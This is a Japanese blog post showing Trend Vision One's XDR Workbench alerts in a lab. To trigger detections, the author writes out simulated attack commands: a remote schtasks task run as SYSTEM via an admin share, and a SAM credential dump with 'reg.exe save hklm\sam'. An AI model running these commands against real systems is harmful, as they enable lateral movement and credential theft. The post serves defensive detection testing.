Trend Vision OneのWorkbenchでアラートを見てみた

Trend Vision OneのWorkbenchでアラートを見てみた

Clock Icon2023.12.25 04:53

こんにちは、シマです。
皆さんはTrend Vision Oneを使っていますか?Trend Vision Oneと言えば、やはりXDRですよね?Trend Vision Oneでは、トレンドマイクロ社の各種セキュリティ製品がセンサーとなって検知したイベントや、サードパーティアプリケーションと連携して収集したイベントを分析することで、脅威の検出や状況の把握に役立てることが可能です。

では、具体的にTrend Vision Oneではどのように脅威の状況を把握できるのでしょうか。今回はその一端を担う「XDR Threat Investigation」の「Workbench」という機能について見ていこうと思います。

Workbenchについて

Workbenchでは、検出モデルによってトリガーされたアラートを表示することができ、それを基に調査や各種対応をすることができます。

具体的にどう表示されるの?試してみた

文字で見てもイメージが湧きにくいと思いますので、実際にアラートを表示させていこうと思います。本来、多くの箇所のセンサーと連携させることで効果を発揮しますが、今回はWorkbenchの画面を確認することが目的なので、以下のような簡単な構成で準備しました。

各EC2内にEndpoint Security(Server & Workload Protection)のエージェントを導入し、アクティビティ監視を有効にしています。また、疑似攻撃アクションをするためにセキュリティの設定を緩くしています。

やってみたアクション

クライアント端末からBastionへリモートデスクトップ接続をします。

BastionからADに対して攻撃と判定されるようなコマンドとして以下を実行しました。

c:\>copy test.bat \\10.0.7.211\C$\test.bat
        1 個のファイルをコピーしました。
c:\>schtasks /Create /S 10.0.7.211 /U shimatest\Administrator /ru SYSTEM /TN sample /SC ONCE /SD 1999/01/01 /ST 00:00 /RL highest /TR C:\test.bat
shimatest\Administrator の実行者パスワードを入力してください: ********************************

警告: /ST が現時刻よりも早いため、タスクは実行されない可能性があります。
成功: スケジュール タスク "sample" は正しく作成されました。

c:\>schtasks /Run /S 10.0.7.211 /U shimatest\Administrator /TN sample
shimatest\Administrator の実行者パスワードを入力してください: ********************************

成功: スケジュール タスク "sample" の実行が試行されました。

c:\>copy \\10.0.7.211\C$\test.hive C:\test.hive
        1 個のファイルをコピーしました。
reg.exe save hklm\sam C:\test.hive

Workbenchの画面を確認する

Trend Vision Oneコンソールへログインし、左ペインから「XDR Threat Investigation」→「Workbench」を選択します。

Workbenchのインサイトに、先ほどのアクションに関連づいてインシデントを作成し、関連するアラートをグループ化したものを表示しています。今回は、リモートからのタスクスケジューラ登録と、バッチ実行によるクレデンシャルダンプに分かれています。それぞれのグループにおいて、重要度を表しているスコアやサーバやユーザ等の影響範囲、攻撃段階等がサマリで表示されていて、とてもわかりやすいです。

「すべてのアラート」タブでは、検出モデルによってトリガーされるアラートが表示されています。試しに、下のアラートをクリックしてみます。

アラートに関連づいたアクションの概略が理解しやすく図示されたものが中央に表示され、左ペインには詳細な情報が記載されています。今回のアクションでは、実行したユーザ「shimatest\administrator」、踏み台にしたサーバのホスト名「bastion」や対象のIPや実行したコマンド等が表示されています。また、今回のアクションはラテラルムーブメントされていることの記載もされていました。

さらに、この画面からは各オブジェクトに対応した様々な処理が可能です。例えば、ユーザであればアカウントの無効化やパスワードのリセット、サーバであればエンドポイントの隔離やリモートシェルセッション等のようなことがこの画面から直接実行できるので、処理を行う際に対象を間違ってしまうこともなく、とても便利だと感じました。

最後に

今回はTrend Vision OneのWorkbenchという機能を見てみました。より多くのセンサーやサードパーティアプリケーションと連携をすることで、更に可視性を高めることができるので、実現性は不明ですがPCやスマホ、その細部(メールやブラウザ拡張機能等)でも連携してみたいと思いました。

本記事がどなたかのお役に立てれば幸いです。

この記事をシェアする

facebook logohatena logotwitter logo

© Classmethod, Inc. All rights reserved.